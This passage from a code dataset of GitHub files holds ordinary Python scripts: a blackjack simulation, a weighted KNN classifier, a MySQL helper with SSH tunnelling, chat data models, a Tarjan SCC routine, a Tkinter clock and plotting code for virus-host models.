playerCardValue > dealerCardValue:\r\n return 1 # player win\r\n elif playerCardValue < dealerCardValue:\r\n return 0 # player loss\r\n else:\r\n return 2 # tie\r\n\r\n# Keeps track of wins, losses, ties, avg.\r\ndef customGame(playerPolicy, deckType, n):\r\n random.seed(time.time())\r\n wins = 0\r\n losses = 0\r\n ties = 0\r\n\r\n for i in range(n):\r\n if deckType:\r\n wonGame = singleDeck(playerPolicy)\r\n else:\r\n wonGame = infiniteDeck(playerPolicy)\r\n if wonGame == 1:\r\n wins += 1\r\n elif wonGame == 0:\r\n losses += 1\r\n else:\r\n ties += 1\r\n\r\n if n - ties == 0:\r\n return wins, losses, ties, 0\r\n avg = wins / (n - ties) * 100\r\n return wins, losses, ties, 
avg","repo_name":"JohnEaganFS/CSCI-154-Simulation-Projects","sub_path":"Blackjack/customGame.py","file_name":"customGame.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72655583787","text":"from calc_engine import *\nimport itertools\nimport hashlib\nimport common_utils\n\nSAVE_INDIRECT_LINES = True\nBASE_DIRECTORY = \"623-01/json\"\n\n# Initialize the table to keep track of known lines\nall_team_names = set(list(initial_lines_df['home_team']) + list(initial_lines_df['away_team']))\nall_possible_matchups = [(tm1, tm2) for tm1, tm2 in itertools.product(all_team_names, all_team_names) if tm1 != tm2]\n\nknown_lines = set()\n\n# Have to store the lines from the initial df as known so we don't save over them\nfor i in range(len(initial_lines_df)):\n    row = initial_lines_df.iloc[i]\n    known_lines.add(common_utils.get_id_for_matchup(row['home_team'], row['away_team']))\n\n# Iterative process whereby we calculate any new lines that we can, then incorporate these new lines during the next iteration\nn = 1\ncurrent_lines_df = initial_lines_df\nwhile True: # For now, go forever, but eventually will change this\n    print(f'Iteration {n}')\n\n    new_lines = []\n    for tm1, tm2 in all_possible_matchups:\n        matchup_id = common_utils.get_id_for_matchup(tm1, tm2)\n        if matchup_id not in known_lines:\n            line = calculate_line(tm1, tm2, neutral=True, lines_df=current_lines_df)\n            if line:\n                new_lines.append(line)\n                known_lines.add(matchup_id)\n\n    print(f'Found {len(new_lines)} new lines')\n\n    if SAVE_INDIRECT_LINES:\n        outfilename = f'{BASE_DIRECTORY}/indirectlines-{n}.json'\n        try:\n            with open(outfilename, 'w') as outfile:\n                outfile.write(json.dumps(new_lines))\n        except TypeError:\n            for line in new_lines:\n                line['neutral'] = bool(line['neutral'])\n            with open(outfilename, 'w') as outfile:\n                outfile.write(json.dumps(new_lines))\n        print(f'Saved to file {outfilename}')\n        infilenames.append(outfilename)\n\n    current_lines_df = lines_df_from_input_files_list(infilenames)\n    n += 1","repo_name":"ldp77/gridline","sub_path":"calculate_indirect.py","file_name":"calculate_indirect.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1066846753","text":"c=0\nc2=0\nvp=0\n\nmenor=0.0\npb=None\nwhile True:\n    np=str(input('Digite o nome do produto: '))\n    c=c+1\n    pp= float(input('digite o preço do produto: '))\n    # keep track of the cheapest product seen so far\n    if pb is None or pp<menor:\n        menor= pp\n        pb= np\n    vp= vp + pp\n    if pp>1000:\n        c2=c2+1\n    per= str (input('Quer continuar?: S/N')).upper()\n    if per=='N':\n        break\nprint (f'O total gasto na compra foi {vp}\\n {c2} produtos custaram mais de 1000\\n O produto mais barato foi {pb}')\n\n","repo_name":"abinoamenezes/CursoEmVideo","sub_path":"ex24.py","file_name":"ex24.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30454066547","text":"import configparser\nimport os\nimport re\nimport shutil\n\n\"\"\"\nScript mirrors the content in ../serialize_raw_640 but instead of the original\n.png-file, corresponding .png-file from DESTINATION_PATH_DENOISED and \nDESTINATION_PATH_COMBINED is copied.\n\"\"\"\n\ndef copy_files(SOURCE_PATH_RAW, \n               SOURCE_PATH_DENOISED, \n               SOURCE_PATH_COMBINED, \n               DESTINATION_PATH_DENOISED, \n               DESTINATION_PATH_COMBINED):\n    pattern = re.compile('.*\\.xml$')\n    # Traverse through the folders\n    for folder_fold in 
os.listdir(SOURCE_PATH_RAW):\n if os.path.isdir(SOURCE_PATH_RAW+'/'+folder_fold):\n for folder_train_test in os.listdir(SOURCE_PATH_RAW+'/'+folder_fold):\n for filename in os.listdir(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test):\n if pattern.match(filename):\n if not os.path.exists(DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test):\n os.makedirs(DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test)\n os.makedirs(DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test)\n\n # Copy the files to respective folder\n file_denoised = filename.split('.')[0]+'.png'\n file_combined = filename.split('.')[0]+'.png'\n shutil.copy(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test+'/'+filename, \\\n DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test+'/'+filename)\n shutil.copy(SOURCE_PATH_DENOISED+'/'+file_denoised, \\\n DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test+'/'+file_denoised)\n shutil.copy(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test+'/'+filename, \\\n DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test+'/'+filename)\n shutil.copy(SOURCE_PATH_COMBINED+'/'+file_combined, \\\n DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test+'/'+file_combined)\n\nif __name__ == '__main__':\n config = configparser.ConfigParser()\n config.read('preprocessing.config')\n copy_filtered_to_serialize = config['COPY_FILTERED_TO_SERIALIZE']\n\n copy_files(\n copy_filtered_to_serialize['source_path_raw'], \n copy_filtered_to_serialize['source_path_denoised'], \n copy_filtered_to_serialize['source_path_combined'], \n copy_filtered_to_serialize['destination_path_denoised'], \n copy_filtered_to_serialize['destination_path_combined']\n )\n","repo_name":"Zsombroo/jkpg-building-detection","sub_path":"copy_filtered_to_serialize.py","file_name":"copy_filtered_to_serialize.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75223449067","text":"'''\n\n WEIGHTED K NEAREST NEIGHBOR ALGORITHM\n\n\n'''\n\n\n''' imports '''\nfrom random import randrange\nfrom math import sqrt\nimport numpy as np\nimport os\n\n\n\n'''\nCalculate the Euclidean distance\n(sum of squared distances)\nbetween two vectors of data\n'''\ndef euclidean_distance(vec1, vec2):\n distance = 0.0\n for i in range(1, len(vec2)-1):\n distance += np.sum(np.square(vec1[i]-vec2[i]))\n return np.sqrt(distance)\n\n\n\n'''\nCross validation method to split a data into n folds,\nreturn grouped data inside a list\n'''\ndef cross_validation(data, n):\n folds = list()\n data_copy = list(data)\n fold_size = int(len(data)/n)\n for _ in range(n):\n fold = list()\n while len(fold) < fold_size:\n index = randrange(len(data_copy))\n fold.append(data_copy.pop(index)) # delete the data row\n folds.append(fold) # after selecting it\n return folds\n\n\n'''\nRuns knn algorithm through applying cross validation\non training data in case test dataset is not provided\n'''\ndef weighted_knn_with_CV(dataset, n, k):\n folds = cross_validation(dataset, n)\n accuracy_list = list()\n for fold in folds:\n train_set = list(folds)\n train_set.remove(fold)\n train_set = sum(train_set, [])\n test_set = list()\n for row in fold:\n row_copy = list(row)\n test_set.append(row_copy)\n row_copy[-1] = None\n predicted = weighted_knn(train_set, test_set, k)\n actual = [row[-1] for row in fold]\n accuracy = get_accuracy(actual, predicted)\n accuracy_list.append(accuracy)\n return 
accuracy_list\n\n\n'''\nRuns weighted knn algorithm with the provided test dataset\n'''\ndef weighted_knn(train_set, test_set, k):\n    scores = list()\n    predicted = weighted_knn_helper(train_set, test_set, k)\n    actual = [row[-1] for row in test_set]\n    accuracy = get_accuracy(actual, predicted)\n    scores.append(accuracy)\n    return scores\n\n\n'''\nWeighted K Nearest Neighbor algorithm to classify\nthe image according to the k neighbors' weights\n'''\ndef weighted_knn_helper(train, test, k):\n    predictions = list()\n    for row in test:\n        output = predict_classification(train, row, k)\n        predictions.append(output)\n    return(predictions)\n\n\n'''\nPredict label of the image through using\ninverse distance weighting method\n'''\ndef predict_classification(train, test_row, k):\n    # get k nearest neighbors\n    neighbors = get_neighbors(train, test_row, k)\n\n    '''\n    label dictionary to store their associated weights\n    these labels can be changed to any label name\n    according to the data that is used\n    '''\n    labels = {\"label1\" : 0, \"label2\" : 0, \"label3\" : 0}\n\n    '''\n    for each point in the neighbors,\n    sum up their inverse distances\n    '''\n    for neighbor in neighbors:\n        label = neighbor[0][-1]\n        dist = neighbor[1]\n        # do not divide by zero\n        if dist != 0:\n            labels[label] += 1/dist\n    \n    # return the most weighted label \n    # as classification\n    label = max(labels.keys(), key=(lambda key: labels[key]))\n    return label\n\n\n'''\nReturn the list of nearest k neighbors of test_row\nafter obtaining and sorting the distances\nbetween test data and all training data\n'''\ndef get_neighbors(train, test_row, k):\n    distances = list()\n    for train_row in train:\n        # calculate euclidean distance between vectors\n        dist = euclidean_distance(test_row, train_row)\n        # add distance to list to sort it later\n        distances.append((train_row, dist))\n    # sort distances in ascending order\n    # to find the nearest neighbors\n    distances.sort(key=lambda tup: tup[1])\n    neighbors = list()\n    for i in range(k):\n        neighbors.append(distances[i])\n    return neighbors\n\n\n'''\nCalculate the classification accuracy\nby comparing the actual and predicted\nlabels\n'''\ndef get_accuracy(actual, predicted):\n    correct = 0\n    for i in range(len(actual)):\n        if actual[i] == predicted[i]:\n            correct += 1\n    return correct / float(len(actual)) * 100.0","repo_name":"didar00/Weighted-KNN-Algorithm-With-Inverse-Distance-Weighting-Method-Python","sub_path":"weighted_knn.py","file_name":"weighted_knn.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21452796706","text":"from django.conf.urls.defaults import *\nfrom valegas.produtos.views import lista_produtos, novo_produto, editar_produto, lista_categorias, nova_categoria, editar_categoria\n\nurlpatterns = [\n\turl(r'^lista-produtos/$', lista_produtos, name='lista_produtos'),\n\turl(r'^lista-categorias/$', lista_categorias, name='lista_categorias'),\n\turl(r'^novo-produto/$', novo_produto, name='novo_produto'),\n\turl(r'^editar-produto/(?P<id>\d+)$', editar_produto, name='editar_produto'),\n\turl(r'^nova-categoria/$', nova_categoria, name='nova_categoria'),\n\turl(r'^editar-categoria/(?P<id>\d+)$', editar_categoria, name='editar_categoria'),\n]","repo_name":"renatobelini/valegas","sub_path":"valegas/valegas/produtos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74876049387","text":"import json\nfrom datetime import datetime\nfrom typing import Union\n\nfrom public.common import logger, reda_conf\nimport pymysql\nimport pymysql.cursors\nfrom sshtunnel import SSHTunnelForwarder\n\n\n# Read configuration parameters\nDB = reda_conf('DB')\nSSH = DB.get('SSH')\nMYSQL = DB.get('MYSQL')\nORACLE = DB.get('ORACLE')\nREDIS = DB.get('REDIS')\nREDIS_CLUSTER = DB.get('REDIS_CLUSTER')\nREDIS_CLUSTER_PASSWORD = DB.get('REDIS_CLUSTER_PASSWORD')\n\n\nclass MysqlServer:\n    \"\"\"\n    Initialize a database connection (optionally through an SSH tunnel) and return query result sets as dictionaries\n    \"\"\"\n\n    def __init__(self, db_host, db_port, db_user, db_pwd, db_database, ssh=False,\n                 **kwargs):\n        \"\"\"\n        Connect to the MySQL database; the ssh flag decides whether the connection goes through an SSH tunnel\n        \"\"\"\n        self.server = None\n        if ssh:\n            self.server = SSHTunnelForwarder(\n                ssh_address_or_host=(kwargs.get(\"host\"), kwargs.get(\"port\")),  # ssh target server ip and port\n                ssh_username=kwargs.get(\"user\"),  # ssh target server username\n                ssh_pkey=kwargs.get(\"pkey\"),  # ssh target server private key\n                remote_bind_address=(db_host, db_port),  # mysql server ip and port\n                local_bind_address=('127.0.0.1', 3307),  # local address used to reach mysql or redis through the tunnel; the ip must be 127.0.0.1\n            )\n            self.server.start()\n            db_host = self.server.local_bind_host  # server.local_bind_host is the ip of local_bind_address\n            db_port = self.server.local_bind_port  # server.local_bind_port is the port of local_bind_address\n        # Establish the connection\n        self.conn = pymysql.connect(host=db_host,\n                                    port=db_port,\n                                    user=db_user,\n                                    password=db_pwd,\n                                    database=db_database,\n                                    charset=\"utf8\",\n                                    cursorclass=pymysql.cursors.DictCursor  # with pymysql.cursors.DictCursor, rows are returned as dictionaries\n                                    )\n        # Create a cursor object\n        self.cursor = self.conn.cursor()\n\n    def query_all(self, sql):\n        \"\"\"\n        Query all rows matching the sql condition\n        :param sql: the sql to execute\n        :return: query result\n        \"\"\"\n        try:\n            self.conn.commit()\n            self.cursor.execute(sql)\n            data = self.cursor.fetchall()\n            # Close the database connection and the tunnel\n            self.close()\n            return self.verify(data)\n        except Exception as e:\n            logger.error(f\"Error while querying all matching rows: {e}\")\n            raise e\n\n    def query_one(self, sql):\n        \"\"\"\n        Query the first row matching the sql condition\n        :param sql: the sql to execute\n        :return: the first row of the query result\n        \"\"\"\n        try:\n            self.conn.commit()\n            self.cursor.execute(sql)\n            data = self.cursor.fetchone()\n            # Close the database connection and the tunnel\n            self.close()\n            return self.verify(data)\n        except Exception as e:\n            logger.error(f\"Error while querying the first matching row: {e}\")\n            raise e\n\n    def insert(self, sql):\n        \"\"\"\n        Insert data\n        :param sql: the sql to execute\n        \"\"\"\n        try:\n            self.cursor.execute(sql)\n            # Commit; every database update must be committed\n            self.conn.commit()\n            # Close the database connection and the tunnel\n            self.close()\n        except Exception as e:\n            logger.error(f\"Error while inserting data: {e}\")\n            raise e\n\n    def update(self, sql):\n        \"\"\"\n        Update data\n        :param sql: the sql to execute\n        \"\"\"\n        try:\n            self.cursor.execute(sql)\n            # Commit; every database update must be committed\n            self.conn.commit()\n            # Close the database connection and the tunnel\n            self.close()\n        except Exception as e:\n            logger.error(f\"Error while updating data: {e}\")\n            raise e\n\n    def query(self, sql, one=True):\n        \"\"\"\n        Query one row or all rows depending on the flag\n        :param sql: the SQL statement to run\n        :param one: defaults to True. True queries one row, otherwise all rows\n        :return:\n        \"\"\"\n        try:\n            if one:\n                return self.query_one(sql)\n            else:\n                return self.query_all(sql)\n        except Exception as e:\n            logger.error(f\"Error while querying data: {e}\")\n            raise e\n\n    def close(self):\n        \"\"\"\n        Close the cursor and the database connection\n        If an SSH tunnel was opened, close it as well\n        :return:\n        \"\"\"\n        # Close the cursor\n        self.cursor.close()\n        # Close the database connection\n        self.conn.close()\n        # Close the SSH tunnel if it was opened\n        if self.server:\n            self.server.close()\n\n    def verify(self, result: dict) -> Union[dict, None]:\n        \"\"\"Verify the result can be serialized by json.dumps\"\"\"\n        # Convert datetime values to strings, since datetime is not JSON serializable\n        try:\n            json.dumps(result)\n        except TypeError:  # TypeError: Object of type datetime is not JSON serializable\n            for k, v in result.items():\n                if isinstance(v, datetime):\n                    result[k] = str(v)\n        return result\n\n\nif __name__ == '__main__':\n    ssh = True\n    db = MysqlServer(MYSQL['host'], MYSQL['port'], MYSQL['user'], MYSQL['password'], MYSQL['db'], ssh,\n                     **SSH)\n    logger.debug(db.query_one(sql=\"select * from user limit 2;\"))\n","repo_name":"huangyaomian/web-ui","sub_path":"utils/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71520816106","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport setuptools\n\nUSING_PYTHON2 = (sys.version_info.major == 2)\nUSING_PYTHON3 = not USING_PYTHON2\n\nauthor = 'Dave Vandenbout'\nemail = 'devb@xess.com'\nversion = '0.0.4'\n\nif 'sdist' in sys.argv[1:]:\n    with open('pygmyhdl/pckg_info.py','w') as f:\n        for name in ['version','author','email']:\n            f.write(\"{} = '{}'\\n\".format(name,locals()[name]))\n\ntry:\n    from setuptools import setup\nexcept ImportError:\n    from distutils.core import setup\n\n\nwith open('README.rst') as readme_file:\n    readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n    history = history_file.read().replace('.. 
:changelog:', '')\n\nrequirements = [\n # Put package requirements here\n 'future >= 0.15.0',\n 'myhdl',\n 'myhdlpeek',\n ]\nif USING_PYTHON3:\n requirements.extend([\n 'byteplay3',\n ])\nelse:\n requirements.extend([\n 'byteplay',\n ])\n\ntest_requirements = [\n # Put package test requirements here\n 'pytest',\n]\n\nsetup(\n name='pygmyhdl',\n version = version,\n description=\"MyHDL hardware design language encased in the tasty PygMyHDL wrapper.\",\n long_description=readme + '\\n\\n' + history,\n author = author,\n author_email= email,\n url='https://github.com/devbisme/pygmyhdl',\n# packages=['pygmyhdl',],\n packages=setuptools.find_packages(),\n entry_points={'console_scripts':['pygmyhdl = pygmyhdl.__main__:main']},\n package_dir={'pygmyhdl':\n 'pygmyhdl'},\n include_package_data=True,\n package_data={'pygmyhdl': ['*.gif', '*.png']},\n scripts=[],\n install_requires=requirements,\n license=\"MIT\",\n zip_safe=False,\n keywords='pygmyhdl',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n ],\n test_suite='tests',\n tests_require=test_requirements\n)\n","repo_name":"devbisme/pygmyhdl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"42466896387","text":"from dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import List\nimport uuid\n\n\nclass User:\n def __init__(self, user_id: str, name: str, email: str, password: str):\n self.user_id = user_id\n self.name = name\n self.email = email\n self.password = password\n self.personal_chats: List[PersonalChat] = []\n self.group_chats: List[GroupChat] = []\n\n def __eq__(self, other):\n if isinstance(other, User):\n return self.user_id == other.user_id\n else:\n return False\n\n\n@dataclass(frozen=True)\nclass Content:\n text: str\n image_ref: str\n video_ref: str\n\n\nclass Message:\n def __init__(self, message_id: str, sender: User, chat, content: Content):\n self.message_id = message_id\n self.sender = sender\n self.chat = chat\n self.content = content\n self.timestamp = datetime.utcnow()\n\n def __eq__(self, other):\n if isinstance(other, Message):\n return self.message_id == other.message_id\n else:\n return False\n\n\nclass GroupChat:\n def __init__(self, group_chat_id: str, name: str, members: List[User]):\n self.group_chat_id = group_chat_id\n self.name = name\n self.members = members\n self.creator = members[0]\n self.admins: List[User] = []\n self.messages: List[Message] = []\n self.calls: List[Call] = []\n\n def __eq__(self, other):\n if isinstance(other, GroupChat):\n return self.group_chat_id == other.group_chat_id\n else:\n return False\n\n def add_member(self, member: User):\n if member not in self.members:\n self.members.append(member)\n member.group_chats.append(self)\n\n def remove_member(self, member: User):\n if member in self.members:\n self.members.remove(member)\n member.group_chats.remove(self)\n\n def make_admin(self, member: User):\n if (member in self.members) and (member != self.creator) and (member not in self.admins):\n self.admins.append(member)\n\n def demote_admin(self, admin: User):\n if admin in self.admins:\n 
self.admins.remove(admin)\n\n\nclass PersonalChat:\n    def __init__(self, personal_chat_id: str, user1: User, user2: User):\n        self.personal_chat_id = personal_chat_id\n        self.user1 = user1\n        self.user2 = user2\n        self.messages: List[Message] = []\n\n    def __eq__(self, other):\n        if isinstance(other, PersonalChat):\n            return self.personal_chat_id == other.personal_chat_id\n        else:\n            return False\n\n\nclass Call:\n    def __init__(self, call_id: str, caller: User):\n        self.call_id = call_id\n        self.caller = caller\n        self.participants: List[User] = [caller]\n        self.start_time = datetime.utcnow()\n        self.end_time = None\n        self.duration = None\n\n    def __eq__(self, other):\n        if isinstance(other, Call):\n            return self.call_id == other.call_id\n        else:\n            return False\n\n    def end_call(self):\n        self.participants = []\n        self.end_time = datetime.utcnow()\n        self.duration = self.end_time - self.start_time\n\n\ndef create_user(name: str, email: str, password: str) -> User:\n    user_id = str(uuid.uuid4())\n    user = User(user_id, name, email, password)\n    return user\n\n\ndef create_group_chat(name: str, members: List[User]) -> GroupChat:\n    group_chat_id = str(uuid.uuid4())\n    group_chat = GroupChat(group_chat_id, name, members)\n    for member in members:\n        member.group_chats.append(group_chat)\n    return group_chat\n\n\ndef add_user_to_group_chat(member: User, group_chat: GroupChat):\n    group_chat.add_member(member)\n    if group_chat not in member.group_chats:\n        member.group_chats.append(group_chat)\n\n\ndef remove_user_from_group_chat(member: User, group_chat: GroupChat):\n    group_chat.remove_member(member)\n    if group_chat in member.group_chats:\n        member.group_chats.remove(group_chat)\n\n\ndef make_admin_of_group_chat(user: User, group_chat: GroupChat):\n    group_chat.make_admin(user)\n\n\ndef send_message(sender: User, chat: GroupChat, content: Content):\n    message_id = str(uuid.uuid4())\n    message = Message(message_id, sender, chat, content)\n    chat.messages.append(message)\n\n\ndef delete_message(message: Message, chat: GroupChat):\n    if message in chat.messages:\n        chat.messages.remove(message)\n\n\ndef find_messages_by_text(text: str, chat: GroupChat) -> List[Message]:\n    founded_results = []\n    for message in chat.messages:\n        if text in message.content.text:\n            founded_results.append(message)\n    return founded_results\n","repo_name":"Readiee/MRPO_Labs","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"29551219246","text":"from tkinter import Tk, Label\nimport time\n\n### create a tkinter window\n\nmaster = Tk()\nmaster.title('Digital Clock')\n\n### create a function using \"def\"\n### This function allows you to display the time on the label\n#### %I = hour; %M = minutes; %S = seconds; %p = AM/PM\n\ndef get_time():\n    timeVar = time.strftime(\"%I:%M:%S %p\")\n    clock.config(text=timeVar)\n    clock.after(1000,get_time)\n\n### Stylize your Label Widget\n### Feel free to change : font, size, background and foreground colors!!\n\nclock = Label(master, font=('Arial', 120),bg='#872229',fg='#DA6998')\nclock.pack()\n\nget_time()\n\n# run the Tk event loop\nmaster.mainloop()","repo_name":"GracieCreates/Python-Mini-Projects","sub_path":"Digital Clock/Clock.py","file_name":"Clock.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7927885592","text":"from typing import List\nimport sys\n\nsys.setrecursionlimit(10**6)\n\n\nclass 
Tarjan(list):\n vis: List[int]\n low: List[int]\n stack: List[int]\n in_stack: List[int]\n sccs: List[List[int]]\n vis_cnt: int\n\n def tarjan(self):\n G = self\n n = len(G)\n G.vis, G.low = [-1] * n, [0] * n\n G.stack, G.in_stack = [], [0] * n\n G.vis_cnt = 0\n G.sccs = []\n for i in range(n):\n if G.vis[i] == -1:\n G.dfs(i)\n invV = [-1] * n\n for i, scc in enumerate(G.sccs):\n for j in scc:\n invV[j] = i\n sccE = set()\n for i in range(n):\n for j in G[i]:\n sccE.add((invV[i], invV[j]))\n sccE = list(sccE)\n return G.sccs, sccE\n\n def dfs(self, i):\n G = self\n G.vis[i] = G.low[i] = G.vis_cnt\n G.vis_cnt += 1\n G.stack.append(i)\n G.in_stack[i] = 1\n for j in G[i]:\n if G.vis[j] == -1:\n G.dfs(j)\n G.low[i] = min(G.low[i], G.low[j])\n elif G.in_stack[j]:\n G.low[i] = min(G.low[i], G.vis[j])\n if G.low[i] == G.vis[i]:\n scc = []\n s = G.stack\n while s[-1] != i:\n scc.append(s.pop())\n scc.append(s.pop())\n for x in scc:\n G.in_stack[x] = 0\n G.sccs.append(scc)\n return\n","repo_name":"caph1993/avispa-lattices","sub_path":"avispa_lattices/utils/algorithm_tarjan.py","file_name":"algorithm_tarjan.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21843459447","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom helpers import *\nfrom collections import Counter\n\n########################################################\n# read data\n########################################################\n\n# first load subset of data that contain replicate\nndf = pd.read_csv('../data/input/preprocessed/nissimov/with_reps.csv').set_index('organism')\nndf = ndf[ndf['virusName']=='EhV-99B1']\nndfh,ndfv = ndf.loc['H'],ndf.loc['V']\n\n# load master experimental dataset\nmaster_df = pd.read_csv('../data/input/processed/processed_data.csv',index_col='id')\nabiotic_treatment_df = pd.read_csv('../data/input/preprocessed/reu_2019/treatments.csv',index_col='id')\nabiotic_treatment_df = abiotic_treatment_df[abiotic_treatment_df['treatment']=='Replete']\nmaster_df = pd.concat((master_df,abiotic_treatment_df))\ntreatments = master_df.query('control==False').copy() # remove controls\ntids = treatments.index.unique() # unique ids\n\n# sort experimental data into a single dictionary\ndatasets = {}\nfor tid in tids[:-1]:\n df = treatments.loc[tid].copy()\n df.loc[:,'log_sigma'] = 0.2\n df.loc[df.organism == 'H', 'time'] = df.loc[df.organism == 'H', 'time'].copy() -\\\n min(df.loc[df.organism == 'H', 'time'])\n df.loc[df.organism == 'V', 'time'] = df.loc[df.organism == 'V', 'time'].copy() -\\\n min(df.loc[df.organism == 'V', 'time'])\n datasets[tid] = df\n\n# load posteriors into a dictionary\nposteriors = {}\ni = 1\nprint('load data')\nfor tid in tids[:-1]:\n print(i,tid)\n i = i+1\n #f = '../data/output/jun25th2021/'+tid+'.csv'\n f = '../data/output/jun27th2021_million/'+tid+'.csv'\n n = 100\n num_lines = sum(1 for l in open(f))\n skip_idx = [x for x in range(1, num_lines) if x % n != 0]\n posteriors[tid] = pd.read_csv(f,low_memory=False,skiprows=skip_idx)\n\n########################################################\n# load priors\n########################################################\n\nmu_prior,phi_prior,beta_prior,tau_prior,H0_prior,V0_prior = load_priors(df)\n\n########################################################\n# setup figures\n########################################################\n\nf1,ax1 = py.subplots(1,2,figsize=[9,4])\nf2,ax2 = py.subplots(3,1,figsize=[12,12])\nf3a,ax3a = 
py.subplots(4,4,figsize=[18,18])\nf3b,ax3b = py.subplots(4,4,figsize=[18,18])\nf3c,ax3c = py.subplots(4,4,figsize=[18,18])\nf3d,ax3d = py.subplots(4,4,figsize=[18,18])\nf4,ax4 = py.subplots()\n\nf3a.subplots_adjust(wspace=0.4,hspace=0.6)\nf3b.subplots_adjust(wspace=0.4,hspace=0.6)\nf3c.subplots_adjust(wspace=0.4,hspace=0.6)\nf3d.subplots_adjust(wspace=0.4,hspace=0.6)\n\n# figure font size\nfs = 12\n\n########################################################\n# do plotting\n########################################################\n\n# figure 1\nax1[0].plot(ndfh.time,ndfh.rep1,'-o',label='rep 1')\nax1[0].plot(ndfh.time,ndfh.rep2,'-^',label='rep 2')\nax1[0].plot(ndfh.time,ndfh.rep3,'-*',label='rep 3')\nax1[1].plot(ndfv.time,ndfv.rep1,'-o')\nax1[1].plot(ndfv.time,ndfv.rep2,'-^')\nax1[1].plot(ndfv.time,ndfv.rep3,'-*')\nl = ax1[0].legend(prop={'size':fs})\nl.draw_frame(False)\nax1[0].semilogy()\nax1[1].semilogy()\nfor a in ax1:\n a.set_xlabel('Time (hours)',fontsize=fs)\nax1[0].set_ylabel('Host (ml$^{-1}$)',fontsize=fs)\nax1[1].set_ylabel('Virus (ml$^{-1}$)',fontsize=fs)\nf1.subplots_adjust(wspace=0.3)\n\n# figure 3\nax3all = np.concatenate((ax3a.flatten(),ax3b.flatten(),ax3c.flatten(),ax3d .flatten()))\nhosts = ax3all[0:-1:2]\nviruses = ax3all[1:-1:2]\ni = 1\nallbests = pd.DataFrame()\nbestmodels = []\nprint('begin plotting')\nfor (hax,vax,tid) in zip(hosts,viruses,tids[:-1]):\n print(i,tid)\n i = i+1\n ddf = datasets[tid]\n models = get_models(ddf)\n hdat =ddf[ddf.organism=='H']\n vdat =ddf[ddf.organism=='V']\n hax.errorbar(hdat.time,np.log(hdat.abundance),yerr=hdat.log_sigma)\n vax.errorbar(vdat.time,np.log(vdat.abundance),yerr=vdat.log_sigma)\n mdf = posteriors[tid] # posteriors\n mi = mdf.loc[mdf.chi==min(mdf.chi)].index[0]\n bestmodelstring = mdf.iloc[mi]['Unnamed: 0']\n bestmodels.append(bestmodelstring)\n bestmodel = models[bestmodelstring]\n bestmodelposteriors = mdf[mdf['Unnamed: 0']==bestmodelstring]\n bestmodelposteriors['algalHost'] = hdat.algalHost.unique()[0]\n bestmodelposteriors['algalHostTaxon'] = hdat.algalHostTaxon.unique()[0]\n bestmodelposteriors['virusName'] = vdat.virusName.unique()[0]\n allbests = pd.concat((allbests,bestmodelposteriors))\n set_optimal_parameters(bestmodel,bestmodelposteriors)\n mod = bestmodel.integrate()\n hax.plot(bestmodel.times,np.log(mod['H']),c='r',lw=2,zorder=2)\n vax.plot(bestmodel.times,np.log(mod['V']),c='r',lw=2,zorder=2)\n hax.set_title(hdat.algalHost.unique()[0])\n vax.set_title(vdat.virusName.unique()[0])\n for a in range(1000):\n set_random_param(bestmodel,bestmodelposteriors)\n mod = bestmodel.integrate()\n hax.plot(bestmodel.times,np.log(mod['H']),c=str(0.8),lw=1,zorder=1)\n 